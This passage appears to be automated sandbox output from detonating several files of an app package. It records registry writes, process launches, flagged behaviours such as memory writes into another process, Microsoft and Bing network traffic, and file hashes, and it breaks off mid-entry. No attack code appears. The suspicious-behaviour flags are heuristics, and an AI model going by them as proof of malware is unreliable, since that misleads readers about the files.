"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\app-64.7z
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\app-64.7z
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\app-64.7z"
Network
Files
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | 5ab93e40bc2a886d9e7e6cf80656de19 |
| SHA1 | bc0a19af85729ae1e25ceff6157af814fcf22366 |
| SHA256 | 80fc5e3544a340a2b951207e6cea301745980a2f57f944c0a075f2ef44eec0a0 |
| SHA512 | 87336356d1d34d9612c74a14e19f051fbe41f1ff4a1ec7b9e74f5c0ceb3b7980730501f83c673cf3aee10ce55260ba231d6ecf227f90e72040836754002503c5 |
Analysis: behavioral10
Detonation Overview
Submitted
2024-05-27 14:34
Reported
2024-05-27 14:41
Platform
win7-20240215-en
Max time kernel
134s
Max time network
134s
Command Line
Signatures
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000006787496bbe827249943f9a43de7ef79d00000000020000000000106600000001000020000000af8e7d28506f020f9981f602b12df57a17b63348e5499bc4d0bb0ee7f3c3c97f000000000e8000000002000020000000c0172f7c375ef770f22ab13ee17a14319d4b9757ca9aaa70a2f96834456d19442000000049402a63979e6eb4d7ec983b83fe77d2fc9a13a5a1f1471527af80e435354f244000000008e5cf8d5d4fe5cd10adc8f01e10eba0fc451dbe1f5af1ba6306d1230a17e785a95c25d78b964b5f8b6f454dc1591764d46c77e651a7422cb95602041335a36c | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{E8F75631-1C36-11EF-8FD2-F6A6C85E5F4F} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000006787496bbe827249943f9a43de7ef79d00000000020000000000106600000001000020000000d528b2fb3184ad3dd5f98402470bb3e80c2db0dff6afb2b819888a5497fca5f9000000000e80000000020000200000001499ad92402998039799f645d752a8b6dab8d1b4e6c53fa571c3374baa56d76f90000000638423d976836e60cd3f9970380cb967be55571a92459826a09c4d51b5be9c1954eaa9baac658e14021ee0c7313dc9ab79a2550f60141e87f4c366cb9903f149601fbcda0946f80b062e3927b6a5f2efbe21f7398c2dc35714e411251ec62f9c887119cd57b4e81b32145f3ecda87e1838232d1bbc5a3f09b15b23ce139af609fd0c0051cb616b5e1ad73a9fc5cad946400000009be46a127df03a09a16d2356c7bb42785c96e40c07b496397fd8ddbebabf6d66bec5a5c7d18d0577a6445663dca0771c7483348f07d45b4e98ec28325fe64449 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "422982631" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 003de4bd43b0da01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2932 wrote to memory of 3028 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2932 wrote to memory of 3028 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2932 wrote to memory of 3028 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2932 wrote to memory of 3028 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
Processes
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\LICENSES.chromium.html
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2932 CREDAT:275457 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Cab4829.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ae0b67df6356caa07bc441177346fb18 |
| SHA1 | a515f710ddaa42ec264ffb6f3f6d07726707ba8f |
| SHA256 | bc8732161d82b014bc409d2d1573a455f42641a9383345a5a010b7111a70ca64 |
| SHA512 | c703cc8b36ddfcd4c7fa4a540b612e932ef65d10432d8fd72f1a612d61f4295d5eba6bd4e8d8e7b57f0c492809067aaed55573cb7181b1ecfcd624c80b0b737c |
C:\Users\Admin\AppData\Local\Temp\Tar490C.tmp
| MD5 | 435a9ac180383f9fa094131b173a2f7b |
| SHA1 | 76944ea657a9db94f9a4bef38f88c46ed4166983 |
| SHA256 | 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34 |
| SHA512 | 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 29f65ba8e88c063813cc50a4ea544e93 |
| SHA1 | 05a7040d5c127e68c25d81cc51271ffb8bef3568 |
| SHA256 | 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184 |
| SHA512 | e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2ba9ea4cb732418d158cbbc4dd3e9613 |
| SHA1 | 0ea2b10a4a65f6e3dfc7a0cabaa5657582d0c16f |
| SHA256 | 021d7eb4db114c0b4770112554ebd1937c55bc100388ae6f70a62f91d9a601aa |
| SHA512 | bd4065bed461682ff47b5069be372d2024bc3f0a380f11eb32ad558f769d1e86cc9fd644c48546ba1669ab386ff8d00bff67cb49da220f38429ffff866bddda5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8d9f63e1a79145b296096c53d754bf41 |
| SHA1 | d9b2e4dfe0c65171ee3d7a10567bb0be3b40238f |
| SHA256 | f588d432f91c125b0549c259a6ca9ef449bb558ed89903f2a4ae656ab8d20a5c |
| SHA512 | d19123524e51252bfc9330847141c1381f6073a3633c3b4e821effba6e3e21c17a4ec8e1293e310b1543154712c6240579b9bc85e41e2af4f67b3546bc6db2cb |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | b531afa5b31fbd77b8a5b49785b5eddf |
| SHA1 | b6411105cc4b71d2ef26be14861ee3d38b454b05 |
| SHA256 | 96bb87611de92ffa2f2faf338fb865efe039db184e524279bd5424614ac4db10 |
| SHA512 | bd134e57ef46828fd03c1972c62cec7418e5eeff599e00426679086cd3843f5eab3b0c6e33ef40e6755a411fef5d4ffd00226b336348e9db26a203c269f05cba |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | e73f89bab6c1c82ee85be7cafe867b39 |
| SHA1 | 99d6701d9da70ec8e7731cd2ca030a2621c263af |
| SHA256 | add69f810065e979dcb851dec59894044b985904c9fe0fcc2240d978bf91d3de |
| SHA512 | 04c5b90687e63d079994df3511f38148be6893e6a226830122ed7897cc07110c5d7c17c2a10f284ad5e01d9b3272ee493b2ba48d61e5b96016ef1ff5379e64ce |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 93607cedddac70a656fd02507d92d8e7 |
| SHA1 | fbcd7f7a73c1431f654079a28c54f49aca3c9956 |
| SHA256 | eb4a880b5de41d46c21478a3f9294d12725343a82cdec30f1e6fe3bf3661d2f7 |
| SHA512 | 0cd48bb0d7743d60075a8eba91a7b930275a84ad0b8da51a2d59967abaabbe1f3bf2a03b5aad1f899336c96b2ae9354bc2801a3340c3d88284d39224f6b1eaaa |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 5a141f52990849244ec68502d9bf97bc |
| SHA1 | 5f3e3aad3ae02661e1055ed087462608e45e45a5 |
| SHA256 | e380a3bbea7823280b484c69521e798a2ff7ce5bd277c34d5cd60e596a7e553a |
| SHA512 | 90bc5bde48ee83729fccdae17d8faa4b58ea4932197f8e4fbc7944823f37a48bb9fd9e64509a97ed0a03896c9f559a720fc29016916da305b61b598619c63721 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 583a4f10bdd67e7131f0954cad803e92 |
| SHA1 | 72e7cb9d58738723e8426d64b2daf706a2200d77 |
| SHA256 | 0f5a31eb08b99990997d352c1b793da1bdd8f87e2c91af514693c7bf0054ecf0 |
| SHA512 | 6cadf58f3a4b27a9b9f0ffbc854898d3ae82bd5430c1e19c99e111ec61cff755b005e2252ad61ed95916965748fc0faacd8036020600165c4e103c8bf4311475 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 217d3a1068f3bd958fd8810fc8302942 |
| SHA1 | 0270f2d897a81d9a1e1bca94f23ccfe033d078c8 |
| SHA256 | 68d1b200cf74a1c392b2b72b7fc4a976fdd7cfcec592d014af9b50a63a33585f |
| SHA512 | 4315b9283eba50c6b5e58ff4d46f12fde0488de517eae3a902842f32f7d5e39b3278a7b87acf179a0ad3df678d1d970070af025ba458bb4ebb752aca4306cedb |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | afd9a1bb87d849693f152ab535d33e1a |
| SHA1 | e36724155f7eb8931ca7f13ff8949e6589ad0e71 |
| SHA256 | bf97681936c1302ca7d4275d338e082370d2f234303232757606d747fa70f5f8 |
| SHA512 | 41c09c237f530f5a39935a43e45a99fb6df9e94ebc895b7b513cba345c8dfc03cf5bf6eaaab6d5ead04c844b347a1fba4e3f4449b3ec6c5796d4f1d10acca589 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6dc1fd1abd008bd731d8a878d678fa8d |
| SHA1 | dc6787cadd37412ca7f58f68e576e2ccbab26039 |
| SHA256 | e691099ecb4e4a2deeb282c1aac7524a4fb3e244c9a313f514c7548fb724ad9a |
| SHA512 | 2a69b8afa28a19559aff097050524c729ca4810f5b61d51c2f7a7c46985bd0080673e9ab98cbbdf89f539b6d3a2480a181fd2a8f0f7d5bc036e832de3ea0f0f0 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 0e44dc54771af37abe5d39d56067e0a0 |
| SHA1 | a3ececfc8ac85975d7a57e85cdbf5a375d7dd84d |
| SHA256 | e9d4e1b01e0a81af6d7c7a73c3da7a85f26a78b686ce18c92779b65ae23cc21b |
| SHA512 | ef404ad77aa05786c954e0a891ed7b2cbf2157a18fe71d0b5828530bf4ebde90c3ef865a37e59951fcbd584d8f3b2353b194a6410894a7a22ef31eaa0e400373 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | b5591dc8527a7f8cab6c465d068d55a4 |
| SHA1 | 2ffc5e5a2e97070b648ad2430e66ee76882bade5 |
| SHA256 | eabe47c203e353d894bfe17dc9eb92d368f4070dc011507b7d4a5ede244f51d7 |
| SHA512 | 1e6e378ae0f7f377596fd58056d6615cb859e229bdd96ec018ebf7a26330d9c74a763ec6199e839f8b5f4658fbe703c88a43bd32c8969d7a5b9dd117176af644 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | f9802fd7b4e37fba9988ee63ddcc3ae9 |
| SHA1 | 978d4551ebb44ba8e6a2e3cc00a44a0b0e95a701 |
| SHA256 | 64113fda9ce00e206e1e6a45af6fdb666f92740fbb315260abcc28df754c3479 |
| SHA512 | 49eacc9357648eba360b0908388af13527103140ec31b991a3bc9f22d92f2751737c928ade452413ce2fd71b2269e9d36146b4fd177066902501d91ed77ea83c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6dce574123584ba12a55c9eea354f962 |
| SHA1 | 026c211803792883c0c0f60cf823ae2e0c64549f |
| SHA256 | b80d41d798f29719b2aa5bfdace1460f818e8281ba3a89fed08c810a37d38a39 |
| SHA512 | 9576cf137a86010ca897e504716a16b9b838eb93ebea62eb3cb857dbe1bb7302bb33f63c7ce3bf86f659d97e4f3154700c3952e9515678c9c8a6b69f9703d115 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | fe0666142d9202e6a2aec89eb412163f |
| SHA1 | 86d9922ba5840a72b00defbd958998e536a44a75 |
| SHA256 | 269aa46a2799e64f08791595e78864b76367542a6a556b04b109e2194228ee35 |
| SHA512 | ac167e36eccf7d858c6f04d36f9d5ce5e989df382972f71676219000a81dccfa7f53d8e29adc176a0dd8c8a1637fe7d6413ffe49d8abe897162510d78c1a56e0 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2c7879094c535721a6ed3744d65718c8 |
| SHA1 | 4c425b494008c4fd8b4a774b8bf1a76e1694a6c1 |
| SHA256 | d698ade34728bf7b4bc9f62b1002366558d36958b686db00f17a2bb105bddba3 |
| SHA512 | f69de2de6049aee2837100a789c21d9e0b7c167a0bdb4b6744b9046173cedbe0e45794577586b21bceff6111ab30f24bc11b945f003db1d1f81c022f047e15d6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 93b29a94bf36dcb974ea03346855d9ab |
| SHA1 | c79792351dd3e914ad7ca87043f29b844e890bec |
| SHA256 | 99b93a5c77b9f2bfd91d70a0ac90003010ded5e148d30bc929179f59444f93f3 |
| SHA512 | 753af0686ef142d00a88f0b01f48bdb608d39977ce2146553ee0ef907a88983271ba87f4cc2a80b8f03252330721f8c506b345c57288edaa9a1e0b72af3c753f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ff0c779657bf759eed0f1f19d2a1e238 |
| SHA1 | c69183a4dd826a4816dd7c65c9715afa945c52dd |
| SHA256 | d7cb72090463cfe5874d67eeeb7efdd85d1e52fd267d7947966dd9750d88d5db |
| SHA512 | a61f02f17ab5badba4e54e256489f1141b9a16f46607878188423bbccfb8b91379d5d2b4c26d799d7aa79816c70af8fe8767cfb944d989dcc81f755723ca2e2a |
Analysis: behavioral15
Detonation Overview
Submitted
2024-05-27 14:34
Reported
2024-05-27 14:42
Platform
win10v2004-20240508-en
Max time kernel
132s
Max time network
155s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\libGLESv2.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 45.19.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
Files
Analysis: behavioral16
Detonation Overview
Submitted
2024-05-27 14:34
Reported
2024-05-27 14:42
Platform
win7-20231129-en
Max time kernel
120s
Max time network
126s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\resources\elevate.exe
"C:\Users\Admin\AppData\Local\Temp\resources\elevate.exe"
Network
Files
Analysis: behavioral17
Detonation Overview
Submitted
2024-05-27 14:34
Reported
2024-05-27 14:42
Platform
win10v2004-20240508-en
Max time kernel
141s
Max time network
156s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\resources\elevate.exe
"C:\Users\Admin\AppData\Local\Temp\resources\elevate.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
Files
Analysis: behavioral18
Detonation Overview
Submitted
2024-05-27 14:34
Reported
2024-05-27 14:42
Platform
win10v2004-20240508-en
Max time kernel
145s
Max time network
162s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\vk_swiftshader.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.179.89.13.in-addr.arpa | udp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-05-27 14:34
Reported
